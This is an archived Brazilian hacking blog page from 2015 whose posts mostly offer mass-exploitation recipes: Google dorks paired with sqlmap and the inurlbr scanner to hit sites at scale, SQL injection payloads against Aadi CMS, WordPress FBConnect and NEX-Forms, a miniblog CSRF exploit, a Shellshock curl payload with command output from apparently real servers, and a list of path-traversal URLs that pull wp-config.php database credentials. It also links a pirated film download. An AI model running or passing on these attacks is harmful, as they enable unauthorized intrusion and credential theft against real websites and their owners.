Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

sábado, 9 de maio de 2015

Explorando CMS Aadi Infosolutions com SQLMAP + INURLBR EM MASSA

Nesse artigo vamos explorar um padrão SQLI no CMS da empresa "Aadi Infosolutions",  muito usado por clientes Indianos.
Vamos usar sqlmap para injeção de SQL e Scanner inurlbr para buscar alvos em massa.

[+] Discoverer Author: Killer~X
[+] EMAIL:             [email protected]
[+] FACEBOOK:          http://www.fb.com/xXalreshyXx
[+] ASK:               http://www.ask.fm/ALRESHY


[+] Dork:      
intext:"Aadi" & inurl:"page.php?id="

[+] POC:      
http://www.target.com/page.php?id=1+XPL_SQLI

[+] Exploit:
DEBUGsqlmap  
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1630=1630 AND 'DBoa'='DBoa
Vector: AND [INFERENCE]

 Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1' AND (SELECT 3932 FROM(SELECT COUNT(*),CONCAT(0x717a627671,(SELECT (ELT(3932=3932,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'wUln'='wUln
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

 Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(10)))HrzP) AND 'jmET'='jmET
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

 Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a627671,0x465169724a72556d4e4f,0x716a6b7071),NULL-- 

    Vector:  UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL-- 

[+] Login Page: 
http://www.test.com/admin

[+] EXPLORING WITH SQLMAP:
sqlmap.py -u 'http://www.target.com/page.php?id=1' -p id --random-agent --beep --level 3 --risk 2 --threads 2 --tor --check-tor --tor-type=SOCKS5 --dbs --dbms='Mysql' --time-sec 10 --batch
OUTPUT PRINT:
[+] EXPLORING WITH SQLMAP: sqlmap.py -u 'http://www.target.com/page.php?id=1' -p id --random-agent --beep --level 3 --risk 2 --threads 2 --tor --check-tor --tor-type=SOCKS5 --dbs --dbms='Mysql' --time-sec 10 --batch OUTPUT PRINT:

[+] EXPLORING WITH MASS INURLBR:
php inurlbr.php --dork 'intext:"Aadi" & inurl:"page.php?id="' -s aadi.txt  -q 1,6 --exploit-get "?&id=1%270x27" --command-vul "sqlmap.py -u '_TARGETFULL_' -p id --random-agent --beep --level 3 --risk 2 --threads 2 --tor --check-tor --tor-type=SOCKS5 --dbs --dbms='Mysql' --time-sec 10 --batch"
OUTPUT PRINT:
[+] EXPLORING WITH MASS INURLBR: php inurlbr.php --dork 'intext:"Aadi" & inurl:"page.php?id="' -s aadi.txt -q 1,6 --exploit-get "&id=1'" --command-vul "sqlmap.py -u '_TARGETFULL_' -p id --random-agent --beep --level 3 --risk 2 --threads 2 --tor --check-tor --tor-type=SOCKS5 --dbs --dbms='Mysql' --time-sec 10 --batch" OUTPUT PRINT:
REF
http://www.exploit4arab.net/exploits/1486

By: às Nenhum comentário:
Marcadores: , , , , ,

quinta-feira, 7 de maio de 2015

WordPress FBConnect SQL Injection Vulnerability + INURLBR VALIDATING HTML RETURN

[ + ] INURLBR 2.1
[ + ] EXPLORING:   SQLI AND VALIDATING HTML RETURN
[ + ] WORDPRESS:  Fbconnect
[ + ] FILE VULN:     fbconnect_action=myhome&fbuserid=1
[ + ] EXPLOIT:        and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0
exec: fbconnect_action=myhome&fbuserid=1 + xpl

[ + ] INURLBR 2.1 [ + ] EXPLORING: SQLI AND VALIDATING HTML RETURN [ + ] WORDPRESS: Fbconnect [ + ] FILE VULN: fbconnect_action=myhome&fbuserid=1 [ + ] EXPLOIT: and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0 exec: fbconnect_action=myhome&fbuserid=1 + xpl


  # AUTOR:         Cleiton Pinheiro / Nick: googleINURL
  # Email:         [email protected]
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin       http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl
  # EA:            http://www.exploit4arab.net/author/248/Cleiton_Pinheiro
  # YOUTUBE:       http://youtube.com/c/INURLBrasil
  # PLUS:          http://google.com/+INURLBrasil


[ + ] SEARCH DORK

--dork 'inurl:"?fbconnect_action="' 



---------------------------------------------------------------------------



[ + OUTPUT VULN

-s sqli.txt  



---------------------------------------------------------------------------



[ + ID SEARCH ENGINES 1 = GOOGLE + CSE, 6 GOOGLE API

-q 1,6 



---------------------------------------------------------------------------



[ + EXPLOIT GET

--exploit-get '/?fbconnect_action=myhome&fbuserid=1 and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0'



---------------------------------------------------------------------------



[ + TYPE INTERNAL VALIDATION

-t 2 



---------------------------------------------------------------------------



[ + SEARCH FOR CUSTOM VALUE

-a 'xpl_success' 



---------------------------------------------------------------------------



[ + FILTER HOSTS URL / MOD UNIQUE = HOST+XPL_GET

--unique



---------------------------------------------------------------------------



[ + ] CONVERTED VALUE

0x78706c5f73756363657373 = hex(xpl_success)



---------------------------------------------------------------------------



- We pass the value (hexdecimal)-'0x78706c5f73756363657373' in our sql injection.



Se a string 'xpl_success' aparecer no retorno html do nosso alvo, Significa que foi explorado com sucesso.

If the string 'xpl_success' appears on the html return of our target, it means that was successfully exploited.



Resumindo eu passo um valor pré-definido na minha injeção sql em formato hexdecimal no select ,caso tal valor retorne no formato string significa que foi executado com sucesso.
No tutorial converti a string xpl_success para hexadecimal que fica 78706c5f73756363657373, injeto no server ele executa e prita pro cliente.
No script INURLBR o parâmetro -t level 2 é pra ser validado com uma busca personalizada dentro do alvo, quando quero achar uma determinada string por isso usamos o comando -a complementando, -t 2 anula a busca de outros erros SQLI  e vai focar somente em nossa string passada através -a 'sua_string'.



if(HTML == xpl_success){ OK }





[ + ] COMMAND:

php inurlbrpriv8.php  --dork 'inurl:"?fbconnect_action="' -s sqli.txt -q 1,6 --exploit-get '/?fbconnect_action=myhome&fbuserid=1 and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0' -t 2 -a 'xpl_success' --unique



[ + ] VÍDEO:






DOWNLOAD SCANNER: 

https://github.com/googleinurl/SCANNER-INURLBR





REF

http://blog.inurl.com.br/2013/09/exploit-wordpress-fbconnectaction-pei.html

http://www.1337day.com/exploit/15790








By:



às





Um comentário:

























Marcadores:
,
,
,
,
,
,
,
,

















terça-feira, 5 de maio de 2015













FILME: Who Am I – Kein System ist sicher












Acompanho o projeto desse filme desde que ainda erá um piloto, pois bem alguns BR fizeram as legendas agora disponibilizo pra todos.







Acompanho o projeto desse filme desde que ainda erá um piloto, pois bem alguns BR fizeram as legendas agora disponibilizo pra todos.





Conheça o grupo subversivo de hackers (CLAY)





Conheça o grupo subversivo de hackers (CLAY)





[ + ] HISTÓRIA 




Benjamin (Tom Schilling) é invisível, um ninguém. 


Isso mudabrutalmente quando ele conhece Max (Elyas M'Barek). 


Mesmo que ambos não poderiam ser parecidos, mas com mesmo 


interesses: hacking. Junto com os amigos de Max, 


o Stephan impulsivo (Wotan Wilke Möhring) eo Paul 


paranóico(ANTOINE MONOT) eles encontraram o 


grupo subversivo de hackers (CLAY) desafiados com atividades


divertidas e capta o 


espírito de toda uma geração.


Pela primeira vez em sua vida Benjamin é uma parte de algo e até 


mesmo atraente Marie (HANNAH) é consciente dele.


Mas a diversão é de repente se torna grave quando o grupo 


fica no grid busca de BKA e Europol.


Caçado pelos agentes Europol Hanne Lindberg 


(TRINE Dyrholm)Benjamin já não é um dos hackers mais 


procurados do mundo.





Um dos poucos filmes que tentam canalizar a questão underground hacking.



Benjamin (Tom Schilling) é invisível, um ninguém. Isso mudabrutalmente quando ele conhece Max (Elyas M'Barek).  Mesmo que ambos não poderiam ser parecidos, mas com mesmo interesses: hacking. Junto com os amigos de Max,  o Stephan impulsivo (Wotan Wilke Möhring) eo Paul paranóico(ANTOINE MONOT) eles encontraram o grupo subversivo de hackers (CLAY) desafiados com atividades divertidas e capta o  espírito de toda uma geração. Pela primeira vez em sua vida Benjamin é uma parte de algo e até mesmo atraente Marie (HANNAH) é consciente dele. Mas a diversão é de repente se torna grave quando o grupo fica no grid busca de BKA e Europol. Caçado pelos agentes Europol Hanne Lindberg (TRINE Dyrholm)Benjamin já não é um dos hackers mais procurados do mundo.  Um dos poucos filmes que tentam canalizar a questão underground hacking.





[ + ] TRAILER













Tamanho: 977MB 

Qualidade: Excelente





[ + ] TORRENT(filme+legenda):

http://www.filedropper.com/whoami-keinsystemistsicher2014web-dl720p970mbbloginurlcombr



http://theanonybay.org/torrent/3094/who-am-i-kein-system-ist-sicher-2014-web-dl-720p-970mb-blog-inurl-com-br



[ + ] FILME e LEGENDAS PT-BR:

https://mega.co.nz/#F!hBEggBYK!SISHvW8QWi_gDZoVCcYMEw



[ + ] LEGENDAS EN:

http://taksub2.in/index.php?u=aHR0cDovL3N1YnNjZW5lLmNvbS9zdWJ0aXRsZXMvd2hvLWFtLWktbm8tc3lzdGVtLWlzLXNhZmUvZW5nbGlzaC8xMTAxMDg2















By:



às





7 comentários:

























Marcadores:
,
,
,

















sábado, 2 de maio de 2015













XPL miniblog 1.0.0 CSRF 4ADD post / INURL BRASIL












[+] Discoverer Author: Mustafa Moshkela  



REF COD POC: http://www.exploit4arab.net/exploits/1482



Greets to: all members in iq-team.org



[+] Discoverer Author: Mustafa Moshkela   REF COD POC: http://www.exploit4arab.net/exploits/1482   Greets to: all members in iq-team.org





Script makes a post without administrative credentials.





  ------------------------------------------------------------------------------






  # SCRIPT by:     [ I N U R L  -  B R A S I L ] - [ By GoogleINURL ]
  # EXPLOIT NAME:  XPL miniblog 1.0.0 CSRF 4ADD post / INURL BRASIL
  # AUTOR:         Cleiton Pinheiro / Nick: googleINURL
  # Email:         [email protected]
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin       http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl
  # YOUTUBE:       http://youtube.com/c/INURLBrasil
  # PLUS:          http://google.com/+INURLBrasil






  ------------------------------------------------------------------------------





  # DATA SUBMISSION WITHOUT VALIDATION



  # Vendor:  http://www.spyka.net/scripts/php/miniblo



  # Google Dork: intext:"Powered by miniblog" ext:php



  # POC:  http://{YOU_URL}/adm/admin.php?mode=add



  # SEND REQUEST POST: adddata[post_title]=TITLE&data[post_content]=<b>YOU_POST</b>&data[published]=1&miniblog_PostBack=Add



  # EXECUTE:  php xpl.php -t http://target.us



  # FILE_OUTPUT:  miniblog_vuln.txt



  # EXPLOIT: http://pastebin.com/xPq4i95F



------------------------------------------------------------------------------

  # EXPLOIT MASS USE SCANNER INURLBR

php inurlbr.php --dork 'intext:"Powered by miniblog" ext:php' -s output.txt --command-all 'php xpl.php -t _TARGET_'



  More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR



  ------------------------------------------------------------------------------



OUTPUT SCAN EXEC:



OUTPUT SCAN EXEC:













By:



às





Nenhum comentário:

























Marcadores:
,
,
,
,
,

















sexta-feira, 1 de maio de 2015













Tool Xpl SHELLSHOCK Ch3ck - Mass exploitation












The tool inject a malicious user agent that allows exploring the vulnerabildiade sheellshock running server-side commands.






  # SCRIPT by:     [ I N U R L  -  B R A S I L ] - [ By GoogleINURL ]
  # EXPLOIT NAME:  Xpl SHELLSHOCK Ch3ck Tool - (MASS)/ INURL BRASIL
  # AUTOR:         Cleiton Pinheiro / Nick: googleINURL
  # Email:         [email protected]
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin       http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl
  # YOUTUBE:       http://youtube.com/c/INURLBrasil
  # PLUS:          http://google.com/+INURLBrasil






- DESCRIPTION - VULNERABILITY(SHELLSHOCK)



- CVE-2014-6271, CVE-2014-6277,

- CVE-2014-6278, CVE-2014-7169,

- CVE-2014-7186, CVE-2014-7187

Shellshock aka Bashdoor, is a security hole in the Bash shell on GNU's Unix-based systems, which was released on September 24, 2014.

Many servers on the Internet such as web servers use Bash to process commands, allowing an attacker to exploit the vulnerability Bash to execute arbitrary commands. This could allow an attacker to gain unauthorized access to a computer system.



- DESCRIPTION - TOOL

The tool inject a malicious user agent that allows exploring the vulnerability

sheelshock running server-side commands.



- DEPENDENCIES:

sudo apt-get install php5 php5-cli php5-curl



- EXECUTE:

     -t : SET TARGET.

  -f : SET FILE TARGETS.

  -c : SET COMMAND.

  -w : SET UPLOAD SHELL PHP.

  Execute:

  php xplSHELLSHOCK.php -t target -c command

  php xplSHELLSHOCK.php -f targets.txt -c command

  SHELL UPLOAD: php xplSHELLSHOCK.php -t target -c command -w

  OUTPUT VULN: SHELLSHOCK_vull.txt



- EXEMPLES:

php xpl.php -t 'http://www.xxxcamnpalxxx.com.br/cgi-bin/login.sh' -c pwd

CMD:

Linux serv 2.6.29.6-smp #2 SMP Mon Aug 17 00:52:54 CDT 2009 i686 Intel(R) Xeon(R) CPU E5504  @ 2.00GHz GenuineIntel GNU/Linux

uid=1000(icone) gid=100(users) groups=100(users)

/ico/camnpal/cgi-bin

END_CMD:





php xpl.php -t 'http://www.xxxbnmxxx.me.gov.ar/cgi-bin/wxis.exe/opac/?IsisScript=opac/opac.xis' -c pwd

CMD:

Linux sitiobnm 2.6.37BNM #26 SMP Tue Jan 25 19:22:26 ART 2011 x86_64 GNU/Linux

uid=1005(webmaster) gid=1003(webmaster) groups=1003(webmaster)

/mnt/volume1/sitio/data/catalogos/cgi-bin

END_CMD:

OUTPUT:



- EXEMPLES: php xpl.php -t 'http://www.xxxcamnpalxxx.com.br/cgi-bin/login.sh' -c pwd CMD: Linux serv 2.6.29.6-smp #2 SMP Mon Aug 17 00:52:54 CDT 2009 i686 Intel(R) Xeon(R) CPU E5504  @ 2.00GHz GenuineIntel GNU/Linux uid=1000(icone) gid=100(users) groups=100(users) /ico/camnpal/cgi-bin END_CMD:   php xpl.php -t 'http://www.xxxbnmxxx.me.gov.ar/cgi-bin/wxis.exe/opac/?IsisScript=opac/opac.xis' -c pwd CMD: Linux sitiobnm 2.6.37BNM #26 SMP Tue Jan 25 19:22:26 ART 2011 x86_64 GNU/Linux uid=1005(webmaster) gid=1003(webmaster) groups=1003(webmaster) /mnt/volume1/sitio/data/catalogos/cgi-bin END_CMD: OUTPUT:





- USE CURL MANUAL EXPLOIT::

curl -v --user-agent '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;"' 'http://www.xxxxxbnmxxxx.me.gov.ar/cgi-bin/wxis.exe/opac/?IsisScript=opac/opac.xis'

OUTPUT:



- USE CURL MANUAL EXPLOIT:: curl -v --user-agent '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;"' 'http://www.xxxxxbnmxxxx.me.gov.ar/cgi-bin/wxis.exe/opac/?IsisScript=opac/opac.xis'





- EXPLOIT MASS USE SCANNER INURLBR

./inurlbr.php --dork 'inurl:"/cgi-bin/login.sh"' -s out.txt -q 1,6 --command-vul "php xpl.php -t '_TARGETFULL_' -c pwd"



More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR



- ACESSO AO EXPLOIT:

Tool Xpl SHELLSHOCK Ch3ck

https://github.com/googleinurl/Xpl-SHELLSHOCK-Ch3ck







REFERENCES:

http://pt.wikipedia.org/wiki/Shellshock

http://curl.haxx.se/docs/manpage.html

https://shellshocker.net/








By:



às





2 comentários:

























Marcadores:
,
,
,
,
,
,
,
,
,
,
,
,

















domingo, 26 de abril de 2015













Roadsec 2015 #Palestra #Hackaflag




















Roadsec 2015 #Palestra #Hackaflag









   Eae galera tudo certo, jh00n aqui novamente com vocês, Hoje eu vou está compartilhando minha experiencia no Roadsec Brasilia que ocorreu no sábado 11/04.



                                    

   Primeiramente quero parabenizar a equipe organizadora do Roadsec, ao Anderson Ramos organizador do evento por ter depositado confiança em mim e na minha palestra, e claro não pode se esquecer da Marina Rocha por ter tido bastante paciência <3.



   O tema da palestra abordado no Roadsec 2015 foi: "Explorando vulnerabilidades DNSCHANGER" onde expliquei o conceito básico sobre DNS, como seria realizado um ataque de alteração de DNS em router's(roteadores) vulneráveis e como se proteger. Durante a palestra foi demonstrado como seria o ataque DNSChanger automatizado e para isso utilizei o scanner routerhunterbr. Os slides, vídeos, fotos estão disponibilizados logo abaixo




















#Hackaflag - CTF















 Como alguns sabem eu fui vencedor do #hackaflag aqui em BSB com 110 Pontos, só que como a organização já tinha dito alguns dias atrás que palestrante não ganharia premiação (Viagem SP - Final) participei mesmo só para brincar e o vencedor foi o Ulisses Alves. O hackaflag começava as 14:00 cheguei case 1 hora e meia atrasado e ainda conseguir alcançar o pessoal.



  Então galera sem muito mimi, vamos as dicas sobre o hackaflag, já tem uma galera me cobrando. Teve vários tipos de desafios: Exploit, Engenharia Reversa, Criptografia, Análise de Dados, Web cada etapa tinha uma dica para aquele desafio.



 Exploit:



  Primeiro eles disponibilizaram uma rede wifi e um painel para você visualizar cada desafios e inserir as flag's capturadas. Na etapa de exploit foi dado um IP que você tinha que da um jeito de entrar para capturar a flag. Já dentro da maquina sair procurando arquivo por arquivo, depois de muito tempo quebrando a cabeça atoa procurando a flag, encontrei um "flag.lnk" que era um atalho de um arquivo "C://flag.txt".





Web:

  Na etapa (Web), Era uma página html simples, com uma textbox e um button, visualizei o código fonte da página, de cara tinha uma pequena autenticação em javascript, seria fácil de mais se fosse esse mesmo. Existia um javascript oculto que era o que funcionava!



Net:



 Na etapa de (Net) Era disponibilizado um arquivo .pcap que você tinha que analisar os dados com wireshark e entrar com usuario e senha em um servidor FTP e encontrar a flag.





O Termino era as 17:00, como eu já tinha chegado não deu para completar o restante dos desafios :(





















By:



às





Um comentário:









































terça-feira, 21 de abril de 2015













WordPress NEX-Forms 3.0 SQL Injection Vulnerability














The "submit_nex_form" ajax function is affected from SQL Injection vulnerability

  [ I N U R L  -  B R A S I L ] - [ By GoogleINURL ]



  -----------------------------------------------------------------------------



# AUTOR SCRIPT:  Cleiton Pinheiro / Nick: googleINURL

# Email:        [email protected]

# Blog:          http://blog.inurl.com.br

# Twitter:      https://twitter.com/googleinurl

# Fanpage:    https://fb.com/InurlBrasil

# Pastebin     http://pastebin.com/u/Googleinurl

# GIT:           https://github.com/googleinurl

# PSS:           http://packetstormsecurity.com/user/googleinurl

# YOUTUBE: http://youtube.com/c/INURLBrasil

# PLUS:          http://google.com/+INURLBrasil



- Who Discovered http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli

- Vulnerability discovered by: Claudio Viviani



  -----------------------------------------------------------------------------



- EXPLOIT NAME: MINI exploit-SQLMAP - WordPress NEX-Forms 3.0 SQL Injection Vulnerability / INURL BRASIL

- VENTOR:       https://wordpress.org/plugins/nex-forms-express-wp-form-builder/

- Dork Google:  inurl:nex-forms-express-wp-form-builder

- Dork Google:  index of nex-forms-express-wp-form-builde

- GET VULN:     nex_forms_Id=(id)

- $nex_forms_Id=intval($_REQUEST['nex_forms_Id'])



  -----------------------------------------------------------------------------



- DBMS:        'MySQL'

- Exploit:       AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)



  -----------------------------------------------------------------------------



Info:  The "submit_nex_form" ajax function is affected from SQL Injection vulnerability

POC: http://target/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=(id)+Exploit



  -----------------------------------------------------------------------------



- --help:

   -t : SET TARGET.

 -f : SET FILE TARGETS.

 -p : SET PROXY

  Execute:

  php wp3xplo1t.php -t target

  php wp3xplo1t.php -f targets.txt

  php wp3xplo1t.php -t target -p 'http://localhost:9090'



  -----------------------------------------------------------------------------



- EXPLOIT MASS USE SCANNER INURLBR

- COMMAND: 

./inurlbr.php --dork 'inurl:nex-forms-express-wp-form-builder' -s wp3xplo1t.txt -q 1,6 --command-all "php wp3xplo1t.php -t '_TARGET_'"



- DOWNLOAD INURLBR:

https://github.com/googleinurl/SCANNER-INURLBR



  -----------------------------------------------------------------------------





- INFO:           http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli/



[!] CODE XPL:

- Xpl script: https://github.com/googleinurl/WordPress-NEX-Forms-3.0-SQL-Injection-Vulnerability



OUTPUT PRINT: 







  OUTPUT PRINT: 



OUTPUT SQLMAP: 

 [03:18:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'

 [03:20:45] [INFO] GET parameter 'nex_forms_Id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable 

 for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 

 [03:24:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'

 [03:24:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found

 [03:25:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'

 [03:25:11] [INFO] checking if the injection point on GET parameter 'nex_forms_Id' is a false positive

 GET parameter 'nex_forms_Id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 

 sqlmap identified the following injection points with a total of 85 HTTP(s) requests:

 ---

 Parameter: nex_forms_Id (GET)

     Type: AND/OR time-based blind

     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

     Payload: action=submit_nex_form&nex_forms_Id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))NdbE)

 ---

 [03:25:12] [INFO] the back-end DBMS is MySQL

 web server operating system: Linux

 web application technology: PHP 5.4.3, Apache 2.2.3

 back-end DBMS: MySQL 5.0.12








By:



às





Nenhum comentário:

























Marcadores:
,
,
,
,
,

















quinta-feira, 9 de abril de 2015













CONCEITO DE SUB_PROCESS / SCANNER INURLBR 2.0












 SUB_PROCESS - Consiste em concatenar uma serie de strings com base de um arquivo predefinido.



 Consiste em concatenar uma serie de strings com base de um arquivo predefinido.







============================================================





[!] LISTA DE STRING'S QUE SERÁ EXECUTADA(concatenada) PRA CADA ALVO ENCONTRADO.




    

  1. ['LIST_XPL_NAME']: = listxpl_wordpress_afd.txt
    2. 




Conteúdo arquivo - URL XPL Wordpress Vulnerability Arbitrary File Download:






    

  • /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
    • 

  • /wp-content/force-download.php?file=../wp-config.php
    • 

  • /wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
    • 

  • /wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
    • 

  • /wp-content/themes/markant/download.php?file=../../wp-config.php
    • 

  • /wp-content/themes/yakimabait/download.php?file=./wp-config.php
    • 

  • /wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
    • 

  • /wp-content/themes/felis/download.php?file=../wp-config.php
    • 

  • /wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
    • 

  • /wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
    • 

  • /wp-content/themes/epic/includes/download.php?file=wp-config.php
    • 

  • /wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
    • 

  • /wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
    • 

  • /wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
    • 

  • /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
    • 

  • /wp-content/themes/lote27/download.php?download=../../../wp-config.php
    • 

  • /wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
    • 

  • /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
    • 

  • /wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php
    • 

  • /wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php
    • 

  • /wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php
    • 

  • /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
    • 

  • /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php
    • 






--------------------------------------------------------------------------------------



[!] CMS WORDPRESS VALIDATION / INURLBR 2.0

 Já possui tal validação por padrão padrão interno.




    

  • ['CMS-WORDPRESS-01'] = "define('DB_NAME'";
    • 

  • ['CMS-WORDPRESS-02'] = "define('DB_USER'";
    • 

  • ['CMS-WORDPRESS-03'] = "define('DB_PASSWORD'";
    • 

  • ['CMS-WORDPRESS-04'] = "define('DB_HOST'";
    • 






--------------------------------------------------------------------------------------



 [!] Running subprocesses:

  

 --sub-file  Subprocess performs an injection 

     strings in URLs found by the engine, via GET or POST.

     Example: --sub-file {youfile}

     Usage:   --sub-file exploits_get.txt

         

 --sub-get defines whether the strings coming from 

     --sub-file will be injected via GET.

     Usage:   --sub-get

         

 --sub-post defines whether the strings coming from 

     --sub-file will be injected via POST.

     Usage:   --sub-get



[!] Descrição de comando usado:




    

  1. DEFINIR DORK:                       --dork 'DORK'
    2. 

  2. DEFINIR ARQUIVO FONTE:  -s 'output.txt'
    3. 

  3. DEFINIR DORK:                       --sub-file 'file_subprocess.txt'
    4. 

  4. FLAG TIPO REQUEST:            --sub-get / FLAG
    5. 

  5. FLAG FILTRO HOST:              --unique  / HOST ÚNICOS EM SEU RESULTADO
    6. 






[!] COMMAND EXEC:

GO! GO! ~

php inurlbr.php --dork 'site:br "Index of /wp-content/plugins/revslider"' -s teste.txt --sub-file 'listxpl_wordpress_afd.txt' --sub-get --unique



--------------------------------------------------------------------------------------





CADA BARRINHA  QUE É DEMONSTRADA, É UM PROCESSO DE VALIDAÇÃO..

Dá mesma forma que usei uns (strings/urls)xpls Wordpress, pode ser usado de outros CMS's...

ou URL's padrões para tentar gerar erros SQLI no server, Ataques LFI dá mesma forma..



[!] VÍDEO DEMONSTRATIVO:







Baixar scanner INURLBR 2.0: 

https://github.com/googleinurl/SCANNER-INURLBR












[ Neither war between hackers, nor peace for the system. ]















By:



às





Nenhum comentário:

























Marcadores:
,
,
,
,
,
,
,
,

















terça-feira, 31 de março de 2015













Inurlbr dorking + Wordpress brute forcing












[ Inurlbr dorking + Wordpress brute forcing ]





[ Inurlbr dorking + Wordpress brute forcing ]



    Eae galera, esses dias eu estava pesquisando algumas falhas em wordpress, então tive uma ideia de montar um script que realiza-se um bruteforce em wordpress's, Só que antes ele cata-se os sites com cms (Wordpress) e salva-se em um .txt.



    Pensei em fazer essa etapa de dorking na mão, mas pra quer ter esse trabalho todo quando se pode se utilizar o nosso scaner Inurlbr <3 com as dorks já definidas. Depois de catar as url na etapa de dorking com Inurlbr, Montei o script que verifica se aquela url trabalha ou não com Wordpress, caso não trabalhar ele te print na tela "Not is wordpress" caso contrario ele realizará o bruteforce com senhas padrões contidas dentro do código. No script tem poucas senhas mas você pode incrementar mas senhas ou se você tiver um pequeno conhecimento em python você pode colocar o script para carregar um wordlist.txt.



   A etapa de dorking você pode escolher em fazer manualmente ou deixar o script fazer por você, na execução ele ira te perguntar; Dorking use to find sites using the inurlbr? [Y][N].









[ COMMAND SCANNER INURLBR ]






    

  • ./inurlbr.php -q 1,6 --dork "[DORK]inurl:wp-content site:.com.br[DORK]inurl:wp-content/plugins/ site:.com.br" -s list.txt --comand-all "echo _TARGET_ >> list.txt"
    • 

  • Você pode adicionar mas dorks no comando do scanner, seperando elas com "[DORK]"
    • 








  [DEMO]



























By:



às





3 comentários:

























Marcadores:
,
,
,
,
,
,
,
,
,

















sexta-feira, 27 de março de 2015













(0DAY) WebDepo - SQL injection 












EXPLOIT NAME: MINI exploit-SQLMAP - (0DAY) WebDepo -SQL injection / INURL BRASIL

Nas minhas pesquisas na web, sobre file_upload descobre um CMS da empresa israelense WebDepo, o mesmo possui falha de file_upload sem autenticação, mas analisando seus GETS pude observar que também tem falhas SQLi em seus parâmetros GET.



AUTOR:       GoogleINURL

Blog:             http://blog.inurl.com.br

Twitter:         https://twitter.com/googleinurl

Fanpage:       https://fb.com/InurlBrasil

Pastebin:       http://pastebin.com/u/Googleinurl

GIT:              https://github.com/googleinurl

PSS:              http://packetstormsecurity.com/user/googleinurl

YOUTUBE:  http://youtube.com/c/INURLBrasil

PLUS:           http://google.com/+INURLBrasil







VENTOR:         http://www.webdepot.co.il

GET VULN:     wood=(id) / $wood=intval($_REQUEST['wood'])



  -----------------------------------------------------------------------------



DBMS: 'MySQL'

